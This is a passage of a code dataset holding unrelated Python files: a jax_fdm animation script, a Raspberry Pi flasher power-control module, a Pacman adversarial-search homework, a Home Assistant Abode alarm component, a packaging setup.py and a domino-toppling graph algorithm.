True\nshow_grid = True\ncamera_zoom = -35 # -35 for monkey saddle, 0 for pringle, 14 for dome, -70 for butt\n\ndecimate = False\ndecimate_step = 0\n\ninterval = 50 # 50\ntimeout = None\nfps = 8\n\nanimate = True\nrotate_while_animate = True\n\nsave = True\n\n# ==========================================================================\n# Read in force density network\n# ==========================================================================\n\nHERE = os.path.join(os.path.dirname(__file__), \"../../data/json/\")\nFILE_IN = os.path.abspath(os.path.join(HERE, f\"{name}_base.json\"))\nnetwork0 = FDNetwork.from_json(FILE_IN)\nmodel = EquilibriumModel(network0)\nnetwork = fdm(network0)\n\n# ==========================================================================\n# Read in optimization history\n# ==========================================================================\n\nFILE_IN = os.path.abspath(os.path.join(HERE, f\"{name}_history.json\"))\nrecorder = OptimizationRecorder.from_json(FILE_IN)\n\n# ==========================================================================\n# Visualization\n# ==========================================================================\n\n# instantiate viewer\nviewer = Viewer(width=1600, height=900, show_grid=show_grid)\n\n# modify view\nif modify_view:\n # number of steps, negative to zoom out\n viewer.view.camera.zoom(camera_zoom)\n # set rotation around z axis to zero\n viewer.view.camera.rotation[2] = 2 * pi / 3\n # set rotation around z axis to zero\n viewer.view.camera.rotation_delta = (2 / 3) * pi / len(recorder.history)\n\n# draw network\nviewer.add(network,\n edgewidth=(0.05, 0.25),\n edgecolor=\"fd\",\n show_nodes=False,\n nodesize=0.5,\n show_reactions=True,\n show_loads=True\n )\n\n# warm start model\nq, xyz_fixed, _loads = [np.asarray(p) for p in recorder.history[0]]\n_ = model(q, xyz_fixed, _loads)\n\n# decimate\nif decimate:\n history = recorder.history[::decimate_step]\n recorder.history = history\n\n# create update function\nif animate:\n config_animate = {\"interval\": interval,\n \"timeout\": timeout,\n \"frames\": len(recorder.history),\n \"record\": save,\n \"record_fps\": fps,\n \"record_path\": f\"temp/{name}_{fps}fps_viewer.gif\"}\n\n @viewer.on(**config_animate)\n def wiggle(f):\n\n print(f\"Current frame: {f + 1}/{len(recorder.history)}\")\n params = (np.array(p) for p in recorder.history[f])\n eqstate = model(*params)\n\n # update network\n network_update(network, eqstate)\n\n # update all buffer objects in the view\n for artist in viewer.artists:\n artist.update()\n for obj in artist.objects:\n obj.update()\n\n if rotate_while_animate:\n viewer.view.camera.rotate(dx=1, dy=0)\n\n# show le crème\nviewer.show()\n","repo_name":"arpastrana/jax_fdm","sub_path":"examples/animation/animation_mesh.py","file_name":"animation_mesh.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"75"} +{"seq_id":"16345294605","text":"#!/usr/bin/env python3\nfrom i2c import i2cAdc, i2cPot\nfrom gpio import pi_gpio\nfrom time import sleep\nimport sys\nfrom utils import isfloat\nfrom database import flashLogger, getconfig\n\ngpio = pi_gpio()\nadc = i2cAdc()\npot = i2cPot()\n\nstepOffset = getconfig(\"VoltageRegulatorAdjustment\")\n\nvoltageAccuracyThreshold = 0.05\n\n\ndef maxPwrControlVoltage():\n return 3.4\n\n\ndef getPotForVoltage(target):\n global stepOffset\n FirstUsefulValue = 45\n Slope = 0.045977678\n return int((5 - target) / (Slope)) + FirstUsefulValue + stepOffset\n\n\n# If your voltages aren't quite accurate, run this, delete the first rows that are all 5v\n# Paste the rest into the excel sheet and update the slope and firstusefulvalue above\ndef calibrate():\n potRange = 127\n tests = []\n gpio.setPsEn(True)\n for x in range(5):\n print(\"Calibrating round\", x, \"of 5\")\n test = {}\n for i in range(potRange):\n pot.setPot(i)\n sleep(0.1)\n test[i] = round(adc.getVoltage(), 2)\n tests.append(test)\n gpio.setPsEn(False)\n for i in range(potRange):\n avg = tests[0][i] + tests[1][i] + tests[2][i] + tests[3][i] + tests[4][i]\n avg = round(avg / 5, 2)\n print(i, avg, tests[0][i], tests[1][i], tests[2][i], tests[3][i], tests[4][i])\n\n\n# Verify our voltage settings\ndef checkPS():\n gpio.setPsEn(True)\n gpio.setPwrEn(False)\n\n print(\"Power supply accuracy test\")\n targets = [1.3, 1.6, 1.8, 2.0, 2.4, 2.8, 3.0, 3.1, 3.3, 3.6, 4.0]\n\n for target in targets:\n potValue = getPotForVoltage(target)\n pot.setPot(potValue)\n sleep(0.1)\n voltage = round(adc.getVoltage(), 2)\n print(\"Target:\", target, \"Act:\", voltage,\"Pot:\",potValue, end=\"\")\n if (\n target * (1 - voltageAccuracyThreshold)\n <= voltage\n <= target * (1 + voltageAccuracyThreshold)\n ):\n print(\" OK\")\n else:\n print(\" Failed\")\n\n gpio.setPsEn(False)\n\n\n# Set the pot for a specific voltage\ndef setVoltage(\n target: float,\n validate: bool = True,\n output: bool = False,\n logger: flashLogger = None,\n) -> bool:\n # Set the voltage to minimum and disable output before we turn it on\n if validate and target <= maxPwrControlVoltage():\n result = pot.setPot(127)\n gpio.setPwrEn(False)\n gpio.setPsEn(True)\n sleep(0.05)\n\n potValue = getPotForVoltage(target)\n result = pot.setPot(potValue)\n if not result:\n return False\n sleep(0.20)\n if validate and target <= maxPwrControlVoltage():\n voltage = adc.getVoltage()\n if output:\n if logger:\n logger.logData(\"Voltage:\", round(voltage,2))\n else:\n print(\"Voltage:\", round(voltage,2))\n if (\n target * (1 - voltageAccuracyThreshold)\n <= voltage\n <= target * (1 + voltageAccuracyThreshold)\n ):\n return True\n if logger:\n logger.logData(\n \"Voltage inaccurate! Check calibration. Target:\",\n target,\n \"Actual:\",\n voltage,\n )\n else:\n print(\n \"Voltage inaccurate! Check calibration. Target:\",\n target,\n \"Actual:\",\n voltage,\n )\n return False\n return True\n\n\ndef disablePower():\n gpio.setPwrEn(False)\n gpio.setPsEn(False)\n\n\ndef enablePower(logFile: flashLogger = None):\n gpio.setPsEn(True)\n gpio.setPwrEn(True)\n sleep(0.2) # Make sure the supply is stable\n voltage = adc.getVoltage()\n if logFile:\n logFile.logData(\"Voltage before flashing:\" + str(voltage))\n else:\n print(\"Voltage before flashing:\" + str(voltage))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n if isfloat(sys.argv[1]):\n setVoltage(float(sys.argv[1]), True, False)\n gpio.setPwrEn(True)\n elif sys.argv[1].lower() == \"off\":\n gpio.setPwrEn(False)\n gpio.setPsEn(False)\n else:\n print(\"Please remove any chips and press Enter to test power supply accuracy\")\n print(\n \"DON'T DO THIS WITH A CHIP ATTACHED, YOU MIGHT DAMAGE IT! Press CTRL+C to Cancel\"\n )\n input()\n checkPS()\n","repo_name":"SeanMollet/PieFlasher","sub_path":"SW/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"15563838843","text":"import random, util\nimport numpy as np\nimport time\nfrom game import Agent\n\n# ********* Reflex agent- sections a and b *********\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n \"\"\"\n def __init__(self):\n self.lastPositions = []\n self.dc = None\n self._turn_durations = []\n\n\n def getAction(self, gameState):\n \"\"\"\n getAction chooses among the best options according to the evaluation function.\n\n getAction takes a GameState and returns some Directions.X for some X in the set {North, South, West, East, Stop}\n ------------------------------------------------------------------------------\n \"\"\"\n # measure run time\n start_time = time.time()\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n end_time = time.time()\n self._turn_durations.append(end_time - start_time)\n\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n The evaluation function takes in the current GameState (pacman.py) and the proposed action\n and returns a number, where higher numbers are better.\n \"\"\"\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n return betterEvaluationFunction(successorGameState)\n\n def final(self, state):\n print('Average turn time: {:0.3f}'.format(np.average(self._turn_durations)))\n self._turn_durations = []\n\n# ********* Evaluation functions *********\n\ndef scoreEvaluationFunction(gameState):\n \"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n \"\"\"\n return gameState.getScore()\n\n######################################################################################\n# b: implementing a better heuristic function\ndef betterEvaluationFunction(gameState):\n \"\"\"\n\n The betterEvaluationFunction takes in a GameState (pacman.py) and should return a number, where higher numbers are better.\n\n A GameState specifies the full game state, including the food, capsules, agent configurations and more.\n Following are a few of the helper methods that you can use to query a GameState object to gather information about\n the present state of Pac-Man, the ghosts and the maze:\n\n gameState.getLegalActions():\n gameState.getPacmanState():\n gameState.getGhostStates():\n gameState.getNumAgents():\n gameState.getScore():\n The GameState class is defined in pacman.py and you might want to look into that for other helper methods.\n \"\"\"\n pacmanPosition = gameState.getPacmanPosition()\n score = gameState.getScore()\n # Calculate ghosts score\n numAgents = gameState.getNumAgents()\n numGhosts = numAgents - 1\n capsuleDistance = min([util.manhattanDistance(capsule, pacmanPosition) for capsule in gameState.getCapsules()], default=0)\n ghostIndices = range(1, numAgents)\n getGhostDistance = lambda g: util.manhattanDistance(pacmanPosition, gameState.getGhostPosition(g))\n closestGhostIndex = min(ghostIndices, key=lambda g: getGhostDistance(g), default=None)\n if closestGhostIndex is None:\n # To avoid getting stuck in loops with no ghosts to break them\n ghostScore = util.random.randint(-10, 10)\n else:\n ghostDistance = getGhostDistance(closestGhostIndex)\n if gameState.getGhostState(closestGhostIndex).scaredTimer:\n # Scared ghosts are an opportunity\n ghostScore = 200 - ghostDistance\n else:\n # Brave ghosts are scary :(\n ghostScore = -(500 - ghostDistance)\n\n # Calculate food score\n food = gameState.getFood()\n foodDistance = np.inf\n for x in range(food.width):\n for y in range(food.height):\n if not food[x][y]:\n continue\n d = util.manhattanDistance(pacmanPosition, (x, y))\n if d < foodDistance:\n foodDistance = d\n foodScore = 10/foodDistance\n\n return score + foodScore + ghostScore\n\n# ********* MultiAgent Search Agents- sections c,d,e,f*********\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxAgent, AlphaBetaAgent & both ExpectimaxAgents.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. Agent (game.py)\n is another abstract class.\n \"\"\"\n\n def __init__(self, evalFn = 'betterEvaluationFunction', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n self._turn_durations = []\n\n # Generic form for getAction, used by all class children\n def _getAction(self, gameState, strategyFunc, kwargs_func=None, init_func=None, newmax_func=None):\n from game import Directions\n begin_time = time.time()\n legal_moves = gameState.getLegalActions(self.index)\n max_score = None\n best_move = Directions.STOP\n if init_func:\n init_func()\n for move in legal_moves:\n state = gameState.generateSuccessor(self.index, move)\n if kwargs_func:\n kwargs = kwargs_func()\n else:\n kwargs = {}\n score = strategyFunc(state, self.index, self.depth, **kwargs)\n if max_score is None or score > max_score:\n max_score = score\n best_move = move\n if newmax_func:\n newmax_func(score)\n end_time = time.time()\n self._turn_durations.append(end_time - begin_time)\n return best_move\n\n def final(self, state):\n print('Average turn time: {:0.3f}'.format(np.average(self._turn_durations)))\n self._turn_durations = []\n\n\n######################################################################################\n# c: implementing minimax\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action from the current gameState using self.depth\n and self.evaluationFunction. Terminal states can be found by one of the following:\n pacman won, pacman lost or there are no legal moves.\n\n Here are some method calls that might be useful when implementing minimax.\n\n gameState.getLegalActions(agentIndex):\n Returns a list of legal actions for an agent\n agentIndex=0 means Pacman, ghosts are >= 1\n\n Directions.STOP:\n The stop direction\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n\n gameState.getScore():\n Returns the score corresponding to the current state of the game\n\n gameState.isWin():\n Returns True if it's a winning state\n\n gameState.isLose():\n Returns True if it's a losing state\n\n self.depth:\n The depth to which search should continue\n\n \"\"\"\n return self._getAction(gameState, self._minimax)\n\n def _minimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # Get scores for all child states\n scores = []\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._minimax(nextState, nextAgent, nextDepth)\n scores.append(score)\n # current agent is us: max layer\n if agentIndex == self.index:\n return max(scores)\n # current agnet is not us: min layer\n return min(scores)\n\n\n######################################################################################\n# d: implementing alpha-beta\n\nclass AlphaBetaAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent with alpha-beta pruning\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action using self.depth and self.evaluationFunction\n \"\"\"\n return self._getAction(gameState, self._alphabeta, kwargs_func=self._return_alpha_beta,\n init_func=self._init_alphabeta, newmax_func=self._update_alpha)\n\n def _init_alphabeta(self):\n self.alpha = -np.inf\n\n def _update_alpha(self, score):\n self.alpha = score\n\n def _return_alpha_beta(self):\n return dict(alpha=self.alpha, beta=np.inf)\n\n def _alphabeta(self, rootState, agentIndex, depth, alpha, beta):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # current agent is us: max layer\n if agentIndex == self.index:\n maxScore = -np.inf\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._alphabeta(nextState, nextAgent, nextDepth, alpha, beta)\n if score >= beta:\n # value from current branch will be unused, so trim it\n return np.inf\n if score > maxScore:\n maxScore = score\n if score > alpha:\n alpha = score\n return maxScore\n # current agnet is not us: min layer\n minScore = np.inf\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._alphabeta(nextState, nextAgent, nextDepth, alpha, beta)\n if score <= alpha:\n # value from current branch will be unused, so trim it\n return -np.inf\n if score < minScore:\n minScore = score\n if score < beta:\n beta = score\n return minScore\n\n######################################################################################\n# e: implementing random expectimax\n\nclass RandomExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n All ghosts should be modeled as choosing uniformly at random from their legal moves.\n \"\"\"\n return self._getAction(gameState, self._expectimax)\n\n def _expectimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # Get scores for all child states\n scores = []\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._expectimax(nextState, nextAgent, nextDepth)\n scores.append(score)\n # current agent is us: max layer\n if agentIndex == self.index:\n return max(scores)\n # current agnet is not us: probabilistic layer\n # RandomGhost treats all steps with equal probabily, so calc a simple average\n return np.average(scores)\n\n######################################################################################\n# f: implementing directional expectimax\n\nclass DirectionalExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent\n \"\"\"\n\n rushProb = 0.8\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n All ghosts should be modeled as using the DirectionalGhost distribution to choose from their legal moves.\n \"\"\"\n return self._getAction(gameState, self._expectimax)\n\n def _expectimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n isPacmanLayer = agentIndex == self.index\n # Get scores for all child states\n scores = []\n movesData = {}\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._expectimax(nextState, nextAgent, nextDepth)\n movesData[move] = dict(score=score)\n # Get the distance from pacman for ghosts (needed for probability calculations)\n if not isPacmanLayer:\n pacmanPos = nextState.getPacmanPosition()\n myPos = nextState.getGhostPosition(agentIndex)\n movesData[move][\"distance\"] = util.manhattanDistance(myPos, pacmanPos)\n # current agent is us: max layer\n if isPacmanLayer:\n return max([ m['score'] for m in movesData.values() ])\n # current agnet is not us: probabilistic layer\n # DirectionalGhost will pick try to rush us with probability >=rushProb\n # probability calculations is similiar to the one the ghost does\n probabilities = util.Counter()\n isScared = rootState.getGhostState(agentIndex).scaredTimer > 0\n if isScared:\n chosenDist = max([ m['distance'] for m in movesData.values() ])\n else:\n chosenDist = min([ m['distance'] for m in movesData.values() ])\n numActions = len(movesData)\n numChosen = len([m for m in movesData.values() if m['distance'] == chosenDist])\n for m, d in movesData.items():\n if d['distance'] == chosenDist:\n probabilities[m] = self.rushProb/numChosen\n probabilities[m] += (1-self.rushProb)/numActions\n probabilities.normalize()\n # Calculate expected score value based on probabilities above\n expected_value = 0\n for m, p in probabilities.items():\n expected_value += p * movesData[m]['score']\n return expected_value\n\n\n######################################################################################\n# I: implementing competition agent\n\nfrom game import Directions\nclass CompetitionAgent(MultiAgentSearchAgent):\n \"\"\"\n Your competition agent\n \"\"\"\n def __init__(self, depth=2):\n MultiAgentSearchAgent.__init__(self, depth=depth)\n self.evaluationFunction = self.betterEvaluationFunction\n self._timeLimit = 28\n self._startTime = time.time()\n\n def final(self, asd):\n # Restart the clock after game has finished\n self._startTime = time.time()\n\n def betterEvaluationFunction(self, gameState):\n pacmanPosition = gameState.getPacmanPosition()\n score = gameState.getScore()\n # Calculate ghosts score\n numAgents = gameState.getNumAgents()\n numGhosts = numAgents - 1\n capsuleDistance = min([util.manhattanDistance(capsule, pacmanPosition) for capsule in gameState.getCapsules()], default=0)\n ghostIndices = range(1, numAgents)\n getGhostDistance = lambda g: util.manhattanDistance(pacmanPosition, gameState.getGhostPosition(g))\n closestGhostIndex = min(ghostIndices, key=lambda g: getGhostDistance(g), default=None)\n if closestGhostIndex is None:\n # To avoid getting stuck in loops with no ghosts to break them\n ghostScore = util.random.randint(-10, 10)\n else:\n ghostState = gameState.getGhostState(closestGhostIndex)\n isScared = ghostState.scaredTimer > 0\n ghostDistance = getGhostDistance(closestGhostIndex)\n ghostPos = ghostState.getPosition()\n if isScared:\n # Scared ghosts are an opportunity\n ghostScore = 200/(1+ghostDistance)\n else:\n # Brave ghosts are scary :(\n ghostScore = -(500/(1+ghostDistance))\n\n # Calculate food score\n food = gameState.getFood()\n foodDistance = np.inf\n for x in range(food.width):\n for y in range(food.height):\n if not food[x][y]:\n continue\n d = util.manhattanDistance(pacmanPosition, (x, y))\n if d < foodDistance:\n foodDistance = d\n foodScore = 10/foodDistance\n\n return score + foodScore + ghostScore\n\n def getAction(self, gameState):\n begin_time = time.time()\n legal_moves = gameState.getLegalActions(self.index)\n max_score = -np.inf\n best_move = Directions.STOP\n for move in legal_moves:\n state = gameState.generateSuccessor(self.index, move)\n score = self._expectimax(state, self.index, self.depth)\n if score > max_score:\n max_score = score\n best_move = move\n return best_move\n\n def _expectimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0 or time.time() - self._startTime > self._timeLimit:\n # Call heuristic if we're out of depth\n # Also skip fancy alg and call heuristic if we're out of time\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # Get scores for all child states\n scores = []\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._expectimax(nextState, nextAgent, nextDepth)\n scores.append(score)\n # current agent is us: max layer\n if agentIndex == self.index:\n return max(scores)\n # current agnet is not us: probabilistic layer\n # RandomGhost treats all steps with equal probabily, so calc a simple average\n return np.average(scores)\n","repo_name":"hkariti/intro_ai","sub_path":"hw2/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":18728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20415576645","text":"\"\"\"\nThis component provides HA alarm_control_panel support for Abode System.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/alarm_control_panel.abode/\n\"\"\"\nimport logging\n\nfrom homeassistant.components.abode import CONF_ATTRIBUTION, AbodeDevice\nfrom homeassistant.components.abode import DOMAIN as ABODE_DOMAIN\nfrom homeassistant.components.alarm_control_panel import AlarmControlPanel\nfrom homeassistant.const import (\n ATTR_ATTRIBUTION, STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_HOME,\n STATE_ALARM_DISARMED)\n\nDEPENDENCIES = ['abode']\n\n_LOGGER = logging.getLogger(__name__)\n\nICON = 'mdi:security'\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up an alarm control panel for an Abode device.\"\"\"\n data = hass.data[ABODE_DOMAIN]\n\n alarm_devices = [AbodeAlarm(data, data.abode.get_alarm(), data.name)]\n\n data.devices.extend(alarm_devices)\n\n add_devices(alarm_devices)\n\n\nclass AbodeAlarm(AbodeDevice, AlarmControlPanel):\n \"\"\"An alarm_control_panel implementation for Abode.\"\"\"\n\n def __init__(self, data, device, name):\n \"\"\"Initialize the alarm control panel.\"\"\"\n super().__init__(data, device)\n self._name = name\n\n @property\n def icon(self):\n \"\"\"Return the icon.\"\"\"\n return ICON\n\n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n if self._device.is_standby:\n state = STATE_ALARM_DISARMED\n elif self._device.is_away:\n state = STATE_ALARM_ARMED_AWAY\n elif self._device.is_home:\n state = STATE_ALARM_ARMED_HOME\n else:\n state = None\n return state\n\n def alarm_disarm(self, code=None):\n \"\"\"Send disarm command.\"\"\"\n self._device.set_standby()\n\n def alarm_arm_home(self, code=None):\n \"\"\"Send arm home command.\"\"\"\n self._device.set_home()\n\n def alarm_arm_away(self, code=None):\n \"\"\"Send arm away command.\"\"\"\n self._device.set_away()\n\n @property\n def name(self):\n \"\"\"Return the name of the alarm.\"\"\"\n return self._name or super().name\n\n @property\n def device_state_attributes(self):\n \"\"\"Return the state attributes.\"\"\"\n return {\n ATTR_ATTRIBUTION: CONF_ATTRIBUTION,\n 'device_id': self._device.device_id,\n 'battery_backup': self._device.battery,\n 'cellular_backup': self._device.is_cellular,\n }\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/alarm_control_panel/abode.py","file_name":"abode.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"29406734932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport importlib\nimport sys\nimport os\n\nfrom typing import Dict\n\nfrom setuptools import setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# To update the package version number, edit data-CAT/__version__.py\nversion: Dict[str, str] = {}\nversion_path = os.path.join(here, 'dataCAT', '__version__.py')\nwith open(version_path, encoding='utf-8') as f:\n exec(f.read(), version)\n\nwith open('README.rst', encoding='utf-8') as readme_file:\n readme = readme_file.read()\n\nbuild_require = [\n 'twine',\n 'wheel'\n]\n\ntests_require = [\n 'pytest>=5.4.0',\n 'pytest-cov',\n 'nlesc-CAT>=0.10.1',\n]\ntests_require += build_require\n\n# Check if rdkit is manually installed (as it is not available via pypi)\ntry:\n importlib.import_module(\"rdkit\")\nexcept ModuleNotFoundError:\n print(\n \"`Nano-CAT` requires the `rdkit` package: https://anaconda.org/conda-forge/rdkit\",\n file=sys.stderr,\n )\n\nsetup(\n name='Data-CAT',\n version=version['__version__'],\n description='A databasing framework for the Compound Attachment Tools package (CAT).',\n long_description=f'{readme}\\n\\n',\n author=['B. F. van Beek'],\n author_email='b.f.van.beek@vu.nl',\n url='https://github.com/nlesc-nano/data-CAT',\n packages=[\n 'dataCAT',\n 'dataCAT.data'\n ],\n package_dir={'dataCAT': 'dataCAT'},\n include_package_data=True,\n license='GNU Lesser General Public License v3 or later',\n zip_safe=False,\n keywords=[\n 'database',\n 'science',\n 'chemistry',\n 'python-3',\n 'python-3-7',\n 'python-3-8',\n 'python-3-9',\n 'python-3-10',\n 'automation'\n ],\n package_data={\n 'dataCAT': [\n 'py.typed',\n '*.pyi',\n 'data/*.pdb'\n ]\n },\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Natural Language :: English',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3.10',\n 'Topic :: Database',\n 'Typing :: Typed'\n ],\n test_suite='tests',\n python_requires='>=3.7',\n install_requires=[\n 'h5py>=3.0.0',\n 'numpy',\n 'pandas',\n 'pymongo',\n 'Nano-Utils>=2.3.1',\n 'AssertionLib>=2.2.0',\n 'plams>=1.5.1',\n 'nlesc-CAT>=0.10.0',\n ],\n tests_require=tests_require,\n extras_require={\n 'test': tests_require,\n 'build': build_require\n }\n)\n","repo_name":"nlesc-nano/data-CAT","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29971035139","text":"# We have a layout of dominoes. We have it as a list of pairs [a, b]. If we knock over block a, block\n# b will also fall over. Find the minimum number of blocks that need to be knocked over by hand so that\n# all dominoes are downed.\n\n\ndef DFSUtil(graph, source, visited, stack):\n visited[source] = True\n for v in graph[source]:\n if not visited[v]:\n DFSUtil(graph, v, visited, stack)\n stack.append(source)\n\n\ndef dfs(graph, source, visited, scc, index):\n visited[source] = True\n scc[index].append(source)\n for v in graph[source]:\n if not visited[v]:\n dfs(graph, v, visited, scc, index)\n\n\ndef DFS(graph, source, visited):\n visited[source] = True\n for v in graph[source]:\n if not visited[v]:\n DFS(graph, v, visited)\n\n\ndef transpose_graph(graph, new_graph):\n for i in range(len(graph)):\n for j in range(len(graph[i])):\n new_graph[graph[i][j]].append(i)\n\n\ndef domino(graph, source):\n max_vertex = 0\n for i in range(len(graph)):\n max_vertex = max(max_vertex, max(graph[i]))\n new_graph = [[] for _ in range(max_vertex + 1)]\n for i in range(len(graph)):\n new_graph[graph[i][0]].append(graph[i][1])\n visited = [False] * len(new_graph)\n stack = []\n for i in range(len(new_graph)):\n if not visited[i]:\n DFSUtil(new_graph, i, visited, stack)\n modified_graph = [[] for _ in range(len(new_graph))]\n transpose_graph(new_graph, modified_graph)\n for i in range(len(new_graph)):\n visited[i] = False\n index = 0\n scc = [[] for _ in range(max_vertex)]\n while len(stack):\n u = stack.pop()\n if not visited[u]:\n dfs(modified_graph, u, visited, scc, index)\n index += 1\n i = 0\n while i < len(scc):\n if len(scc[i]) == 0:\n del (scc[i])\n else:\n i += 1\n for i in range(len(scc)):\n if len(scc[i]) > 1:\n for j in range(len(graph)):\n if graph[j][0] in scc[i]:\n graph[j][0] = scc[i][0]\n if graph[j][1] in scc[i]:\n graph[j][1] = scc[i][0]\n i = 0\n while i < len(graph):\n if graph[i][0] == graph[i][1]:\n graph.remove(graph[i])\n else:\n i += 1\n for i in range(len(graph)):\n for j in range(len(scc)):\n if graph[i][0] in scc[j]:\n graph[i][0] = j\n break\n for i in range(len(graph)):\n for j in range(len(scc)):\n if graph[i][1] in scc[j]:\n graph[i][1] = j\n break\n max_vertex = 0\n for i in range(len(graph)):\n max_vertex = max(max_vertex, max(graph[i]))\n last_graph = [[] for _ in range(max_vertex + 1)]\n for i in range(len(graph)):\n last_graph[graph[i][0]].append(graph[i][1])\n visit = [False] * (max_vertex + 1)\n count = 0\n for i in range(len(graph)):\n if not visit[i]:\n count += 1\n DFS(last_graph, i, visit)\n return count\n\n\ngraph = [[0, 1], [1, 2], [2, 3], [3, 1], [3, 5], [4, 2], [5, 6], [6, 7], [7, 8], [8, 9], [9, 6]]\nprint(domino(graph, 0))\n","repo_name":"Szymon-Budziak/Algorithms_and_Data_Structures_course_AGH","sub_path":"Graph algorithms/19_domino.py","file_name":"19_domino.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"75"} +{"seq_id":"70467647921","text":"import argparse\n# 